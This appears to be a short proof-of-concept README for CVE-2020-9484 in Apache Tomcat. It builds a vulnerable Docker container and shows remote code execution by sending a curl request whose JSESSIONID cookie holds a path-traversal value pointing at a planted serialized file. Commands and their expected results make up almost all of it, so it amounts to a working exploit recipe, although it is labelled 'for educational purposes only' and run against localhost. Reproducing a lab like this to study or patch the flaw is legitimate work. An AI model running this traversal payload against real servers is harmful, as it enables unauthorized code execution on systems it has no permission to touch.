For educational purposes only.
See Reference for the details.
$ git clone https://github.com/masahiro331/CVE-2020-9484.git
$ cd CVE-2020-9484
$ docker build -t tomcat:groovy .
$ CONTAINER=`docker run -d -p 8080:8080 tomcat:groovy`
$ docker exec -it $CONTAINER ls -la /tmp
NOTE: (rce
NOT in output)
$ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'
$ docker exec -it $CONTAINER ls -la /tmp
NOTE: (rce
IS in output)